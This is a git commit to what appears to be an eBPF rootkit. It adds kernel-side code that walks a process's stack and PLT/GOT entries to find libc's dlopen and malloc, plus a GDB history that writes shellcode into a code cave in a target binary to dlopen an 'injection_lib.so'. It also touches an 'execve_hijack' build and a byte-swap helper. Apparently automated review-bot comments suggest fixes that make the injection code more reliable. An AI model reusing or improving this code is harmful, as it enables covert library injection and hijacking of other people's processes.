Adapted memory analysis to larger memory addresses inside the virtual address space. Fixed bugs and other issues, adapting the code for RELRO.

This commit is contained in:
h3xduck
2022-04-04 17:07:45 -04:00
parent 8f28c3a883
commit 748062f464
13 changed files with 12256 additions and 11528 deletions





@@ -14,6 +14,7 @@
#define OPCODE_JUMP_BYTE_0 0xe8
#define GLIBC_OFFSET_MAIN_TO_SYSCALL 0xf00d0
#define GLIBC_OFFSET_MAIN_TO_DLOPEN 0x12f120
#define GLIBC_OFFSET_MAIN_TO_MALLOC 0x6eca0
#define CODE_CAVE_ADDRESS 0x0000000000402e95
struct sys_timerfd_settime_enter_ctx {
@@ -60,29 +61,35 @@ static __always_inline int check_syscall_opcodes(__u8* opcodes){
static __always_inline int stack_extract_return_address_plt(__u64 stack){
//We have a possible call instruction, we check if it starts with the correct format
__u8 *op = (__u8*)(stack - 0x5);
__u64 *op = (__u64*)(stack - 0x5);
__u8 opcode_arr[5];
bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op);
if(bpf_probe_read(&opcode_arr, 5*sizeof(__u8), op)<0){
//bpf_printk("Failed to read stack position\n");
return -1;
}
//bpf_printk(" -- Checking: %lx, res: %x %x", op, opcode_arr[0], opcode_arr[1]);
//bpf_printk("%x %x %x\n", opcode_arr[2], opcode_arr[3], opcode_arr[4]);
if (opcode_arr[0] != OPCODE_JUMP_BYTE_0) {
//bpf_printk(" -- Failed OPCODE: %x\n", opcode_arr[0]);
return -1;
}
bpf_printk("Success OPCODE: %lx\n", op);
//We have localized the call instruction and thus quite probably the saved RIP.
//We proceed to get the offset of the call.
__u32 offset;
if(bpf_probe_read_user(&offset, sizeof(__u32), &op[1])<0){
__s32 offset = 0;
__u8* op8 = (__u8*)(stack - 0x5);
if(bpf_probe_read_user(&offset, sizeof(__s32), &op8[1])<0){ //This takes the 4 MSB omitting the first
bpf_printk("Failed to read op[1]\n");
return -1;
}
bpf_printk("OP[1]: %x\n", &op[1]);
bpf_printk("OP64[1]: %x\n", &op[1]);
bpf_printk("OP8[1]: %x\n", &op8[1]);
bpf_printk("OFFSET: %x\n", offset);
bpf_printk("OFFSET8: %x\n", (__u8)offset);
bpf_printk("OP8: %x\n", (__u8*)op);
__u32 sum = (uintptr_t)(op+offset+5);
bpf_printk("SUM: %x\n", sum);
__u8* call_addr = (__u8*)(__u64)sum;
bpf_printk("OP: %lx\n", op);
__u64 sum = (uintptr_t)((__u64)(op8)+offset+5);
bpf_printk("SUM: %lx\n", sum);
__u64* call_addr = (__u64*)sum;
//We check which address was called. We could either be at libc already after
//following it, or in the PLT entry on the same executable as before.
@@ -98,19 +105,19 @@ static __always_inline int stack_extract_return_address_plt(__u64 stack){
bpf_printk("CALL_OPCODES: %lx\n", call_opcode);
bpf_probe_read_user(&opcode_arr, 2*sizeof(__u8), call_addr);
//bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
//bpf_printk("OPCODE1: %x\n", opcode_arr[1]);
bpf_printk("OPCODE0: %x\n", opcode_arr[0]);
bpf_printk("OPCODE1: %x\n", opcode_arr[1]);
__u8* call_addr_arr = (__u8*)call_addr;
if(opcode_arr[0]==0xff && opcode_arr[1]==0x25){
bpf_printk("Found PLT entry\n");
//We analyze the offset of the jump specified ff 25 XX XX XX XX
//The address to which the jump takes us should be the actual syscall setup
__u32 j_offset;
bpf_probe_read_user(&j_offset, sizeof(__u32), &call_addr[2]);
//j_offset += 6;
//The address to which the jump takes us from the PLT.GOT should be the actual syscall setup
__s32 j_offset;
bpf_probe_read_user(&j_offset, sizeof(__s32), &call_addr_arr[2]); //4 LSB
//We obtain the address of the jump by adding the offset + our current memory address + 6 bytes of the current instruction
__u64* j_addr = (u64*)(call_addr + j_offset + 6);
bpf_printk("JOFFSET: %x\n", j_offset);
__u64* j_addr = (u64*)((__u64)(call_addr_arr) + j_offset + 0x6);
bpf_printk("JOFFSET: %lx\n", j_offset);
bpf_printk("JADDR: %lx\n", j_addr);
//Now that we have the address of the jump, we proceed to get the instruction opcodes there
//However it's a bit more complex since what we have is the address in the GOT section where
@@ -257,6 +264,7 @@ int sys_exit_timerfd_settime(struct sys_timerfd_settime_exit_ctx *ctx){
bpf_printk("PID: %u, SYSCALL_ADDR: %lx, STACK_RET_ADDR: %lx", pid, addr.libc_syscall_address, addr.stack_ret_address);
bpf_printk("Address of libc main: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL);
bpf_printk("Address of libc_dlopen_mode: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_DLOPEN);
bpf_printk("Address of malloc: %lx\n", addr.libc_syscall_address - GLIBC_OFFSET_MAIN_TO_SYSCALL + GLIBC_OFFSET_MAIN_TO_MALLOC);
return 0;
}
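Review bot: The two reads in the PLT branch, `bpf_probe_read_user(&opcode_arr, 2*sizeof(__u8), call_addr);` and `bpf_probe_read_user(&j_offset, sizeof(__s32), &call_addr_arr[2]);`, discard the helper's return value, so a failed read leaves `opcode_arr` holding the bytes from the earlier probe and `j_offset` uninitialized before it is folded into `j_addr`; guard both the way the first read in the function now is, e.g. `if (bpf_probe_read_user(&j_offset, sizeof(__s32), &call_addr_arr[2]) < 0) return -1;`. The first read of the stack still goes through the legacy `bpf_probe_read` while every later access to the same user address uses `bpf_probe_read_user`; switching it keeps the helper choice consistent (the legacy helper is not guaranteed to read user memory on every architecture — verify for the target kernel). `op` is now a `__u64 *` but the `OP64[1]` line still prints it with `%x`, which shows only the low 32 bits of the pointer, unlike the `%lx` used on the `Success OPCODE` line. `stack_extract_return_address_plt` continues past the end of the hunk.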


@@ -1,256 +1,256 @@
q
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
b *(test_time_values_injection+77 )
r
b __timerfd_settime
c
find 0x00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
x/128i 0x402e95
x/128x 0x402e95
x/128x 0x402e90
x/128i 0x402e90
x/128i 0x402e89
x/10i 0x402e89
x/10i 0x402e90
x/10i 0x402e80
x/128i 0x402e89
x/256i 0x402e89
x/256i 0x402e90
find 0x90909090909090909090909090909090 0x401000 0x403000
context
x/10i 401520
x/10i 0x401520
x/10i 0x401260
x/10i 0x401250
q
r
disass /r 0x405130
x/10i 0x401520
q
b *(test_time_values_injection+77 )
disass /r test_time_values_injection
b *(test_time_values_injection+169)
r
b __timerfd_settime
c
x/10i 0x401250
x/10i 0x401260
x/10i 0x405130
x/10 0x405130
x/10x 0x405130
c
x/10x 0x405130
x/10i 0x405130
c
x/10i 0x405130
si
c
r
q
r
b *0x4013a8
r
r
r
b test_time_values_injection
r
s
q
b test_time_values_injection
r
b 0x4013a8
b *0x4013a8
b *0x4013a4
r
q
b *0x4013a8
r
b test_time_values_injection
r
n
q
b test_time_values_injection
r
n
ni
del 1
del 2
r
b test_time_values_injection
r
q
r
q
disass test_time_values_injection
q
r
q
si
b test_time_values_injection
r
b __timerfd_settime
r
c
del 1
x/10i 0x405130
c
r
b test
q
b test_time_values_injection
r
n
ni
si
ni
si
si
q
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
checksecq
q
checksecq
checksec
q
checksec
q
q
q
q
x/10x 0x402e95
b test_time_values_injection
r
x/10x 0x402e95
x/10x 0x405130
b __timerfd_settime
c
x/10x 0x405130
c
x/10x 0x405130
q
b test_time_values_injection
r
b __timerfd_settime
c
si
x/10x 0x405130
disass test_time_values_injection
b *(test_time_values_injection+169 )
c
si
x/10x 0x402e95
q
b test_time_values_injection
r
b __timerfd_settime
c
x/10x 0x402e95
x/10x 0x405130
si
x/10x 0x405130
b *(test_time_values_injection+169 )
c
si
set *(int64_t *)0x402e95 0x10
set *(int64_t *)0x402e95 = 0x10
x/10x 0x405130
x/10x 0x402e95
set *(int64_t *)0x402e95 = 0x102131415161718191
set *(int64_t *)0x7ffff7d89560 =
x/10x 0x402e95
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x50
x/10b 0x402e95
x/10i 0x402e95
x/10i 0x7ffff7d89560
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F0000
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F00
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
disass /r 0x402e95
disass 0x402e95
disass /r *0x402e95
x/10i 0x402e95
x/10x 0x405130
x/10i 0x405130
x/10i 0x401260
x/10b 0x401260
x/10i 0x402e95
x/10b 0x401260
x/10i 0x402e95
x/10b 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e9d = 0xffe0
x/10b 0x402e95
context
si
x/10i 0x402e95
si
q
b test_time_values_injection
r
b *(test_time_values_injection+169)
r
c
x/10i 0x402e95
x/10b 0x401260
x/10x 0x405130
si
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/10i 0x402e95
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/10b 0x402e95
set 0x402e9d = 0xffe000000
x/10b 0x402e95
x/12b 0x402e95
x/10i 0x402e95
set 0x402e95 = 0x48B86095D8F7FF7F0000
set 0x402e95 = 0x48B86095D8F7FF7F
set *(int64_t *)0x402e95 = 0x48B86095D8F7FF7F
x/10b 0x402e95
x/14b 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0x0000ffe0
x/20b 0x402e95
set *(int64_t *)0x402ead = 0x6F2F650440C76D6F
set *(int64_t *)0x402eb5 = 0x65786F620840C773
x/128b 0x402e95
x/12i 0x402e95
set *(int64_t *)0x402eb5 = 0x65786F620840C773
set *(int64_t *)0x402ebd = 0xC746542F730C40C7
set *(int64_t *)0x402ec5 = 0x40C772732F471040
set *(int64_t *)0x402ecd = 0x1840C765682F6314
set *(int64_t *)0x402ed5 = 0x731C40C77265706C
set *(int64_t *)0x402edd = 0x656A2040C76E692F
set *(int64_t *)0x402ee5 = 0x6E6F692440C77463
set *(int64_t *)0x402eed = 0x2E62696C2840C75F
set *(int64_t *)0x402ef5 = 0x4800006F732C40C7
set *(int64_t *)0x402efd = 0x007FFFF7F165B0B8
set *(int64_t *)0x402f05 = 0x894800000001BE00
set *(int64_t *)0x402f0d = 0x00C481484889DCDF
set *(int64_t *)0x402f1e = 0xD0FFE58948000010
x/12i 0x402e95
x/20i 0x402e95
x/20b 0x402e95
x/10i 0x401230
x/22i 0x402e95
set *(int64_t *)0x402f0d = 0x00C48148DC8948DF
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0xD0FFE58948000010
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0x0000E58948000010
x/22i 0x402e95
set *(int64_t *)0x402f1e = 0x0
x/22i 0x402e95
set *(int64_t *)0x402f15 = 0x0000E58948000010
set *(int64_t *)0x402f15 = 0xD0FFE58948000010
x/22i 0x402e95
x/25i 0x402e95
si
fin
si
ni
q
b *(test_time_values_injection+169)
r
q
disass /r test_time_values_injection
x/10i 0x4013a0
x/10b 0x4013a0
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe000000
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xffe00000
x/20b 0x402e95
x/10i 0x4013a0
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20b 0x402e95
x/20i 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff00000
x/20i 0x402e95
x/20b 0x402e95
set *(int64_t *)0x402e9d = 0xe0ff0000
x/20i 0x402e95
set *(int64_t *)0x402e95 = 0x7FFFF7D89560B848
x/20i 0x402e95
context
b *(test_time_values_injection+96)
r
si
si
si
si
si
c
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+96)
r
si
x/32b 0x5555555556a9
x/32x 0x5555555556a9
x/2i 0x5555555556a9
disass 0x5555555556a9
disass /r 0x5555555556a9
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
r
q
r
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+169)
r
si
fin
q
b *(test_time_values_injection+169)
r
si
q
b *(test_time_values_injection+169)
r
si
q
r
q
r
q
r
q
r
q
r
q
r
q
r
q
disass test_time_values_injection
b *(test_time_values_injection+96)
r
si
disass 0x7ffff7ede56c
disass /r 0x7ffff7ede56c
q
b *(test_time_values_injection+96)
r
si
q
b *(test_time_values_injection+96)
r
si
x/2i 0x5555555556a9
x/2b 0x5555555556a9
x/22b 0x5555555556a9
q
b *(test_time_values_injection+96)
r
si
disass /r 0x5555555556ae
q
b *(test_time_values_injection+169)
r
si
q
b *(test_time_values_injection+169)
r
q
b *(test_time_values_injection+96)
r
q
b *(test_time_values_injection+96)
r
q
b test_time_values_injection
r
ni
si
fin
q
r
q
r
q
disass test_time_values_injection
b *(test_time_values_injection+96)
r
si
q
disass test_time_values_injection
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
restart
c
r
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
x/10x 0x5555555556a9
x/10i 0x5555555556a9
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
q
b *(test_time_values_injection+94)
r
si
x/10i 555555555510
x/10i 0x555555555510
x/10x 0x555555555510
q
b *(test_time_values_injection+94)
r
si
x/10x 0x555555555510
x/10i 0x555555555510
q
q
q
disass test_time_values_injection
b *(test_time_values_injection+167)
r
si
find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
find 0x000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 0x401000 0x403000
context
q
b *(test_time_values_injection+169)
r
si
x/10i 0x401260
q
b *(test_time_values_injection+169)
r
si
q


@@ -12,7 +12,7 @@ execve_hijack.o: execve_hijack.c $(HEADERS)
clang -g -c execve_hijack.c
execve_hijack: execve_hijack.o lib/libRawTCP_Lib.a
clang -lm -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clang -g -o execve_hijack execve_hijack.o -ldl -L. lib/libRawTCP_Lib.a
clean:
-rm -f execve_hijack.o




@@ -0,0 +1,15 @@
#!/usr/bin/env python3
import sys
from itertools import chain
while True:
arg = input()[::-1]
group = 2
result = "".join(chain.from_iterable([reversed(elem) for elem in zip(*[iter(arg)]*group)]))
if(len(result) != len(arg)):
print("String not with even characters?")
#exit(1)
print(result)
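Review bot: `input()` raises `EOFError` once stdin is exhausted, so the `while True` loop ends with a traceback instead of exiting cleanly; wrapping the read as `try: arg = input()[::-1]` / `except EOFError: break` (or iterating `for line in sys.stdin:`) would also give the currently unused `sys` import a purpose. `zip(*[iter(arg)]*group)` silently drops a trailing odd character, which is what the length check detects, but after printing the message the code falls through and prints the truncated result anyway, so the commented-out `#exit(1)` intent is lost; a `continue` or `sys.exit(1)` after the message would restore it. A one-line module docstring such as `"""Reverse the order of two-character groups in each input line."""` would make the purpose of the `chain`/`reversed` expression clear to the next reader.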


@@ -1,4 +1,2 @@
break test_time_values_injection
break __dlopen
break *(test_time_values_injection+169)


@@ -1,5 +1,3 @@
break test_time_values_injection
disable $bpnum
break *(test_time_values_injection+169)
break *(test_time_values_injection+94)
disable $bpnum